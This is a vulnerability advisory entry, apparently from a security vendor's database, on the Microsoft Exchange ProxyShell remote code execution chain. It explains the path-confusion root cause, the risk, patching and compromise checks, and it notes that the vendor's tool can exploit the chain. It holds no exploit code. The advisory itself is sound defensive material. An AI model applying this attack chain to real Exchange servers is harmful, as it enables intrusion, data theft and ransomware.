Microsoft Exchange - Remote Code Execution (ProxyShell - CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
- Severity
- CVSSv3 Score
- 9.8
- Vulnerability description
Microsoft Exchange is vulnerable to CVE-2021-34473, a Pre-auth Path Confusion Leads to ACL Bypass vulnerability, affecting the Autodisover endpoint, used by the Exchange Client Access Service (CAS). The root cause of this vulnerability is a feature called "Explicit Logon" and due to insufficient checks on the URL, this leads to arbitrary access to the backend services with administrative privileges. Correlated with CVE-2021-34523 (Elevation of Privilege on the Exchange PowerShell Backend) and CVE-2021-31207 (Post-Authentication Arbitrary File Write), the attacker can write a file to any path on the server. Therefore, it can lead to an unauthenticated Remote Code Execution on the Exchange server, an attack chain that was named ProxyShell.
- Risk description
The risk exists that a remote unauthenticated attacker can fully compromise the Exchange server in order to steal confidential information, install ransomware or pivot to the internal network.
- Exploit capabilities
Sniper can gain unauthenticated Remote Code Execution on the target system and extract multiple artefacts as evidence.
- Recommendation
Applying the latest Microsoft patch for the Exchange Server should fix this vulnerability. Furthermore, if the server was exposed to the Internet, there is a high probability that it has alredy been compromised by malicious actors. An analysis by looking for indicators of compromise must be done.
- References
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207/- Codename
- ProxyShell
- Detectable with
- Network Scanner
- Exploitable with Sniper
- Yes
- Vuln date
- Aug 2021
- Published at
- Updated at
- Software Type
- Email server
- Vendor
- Microsoft
- Product
- Exchange Server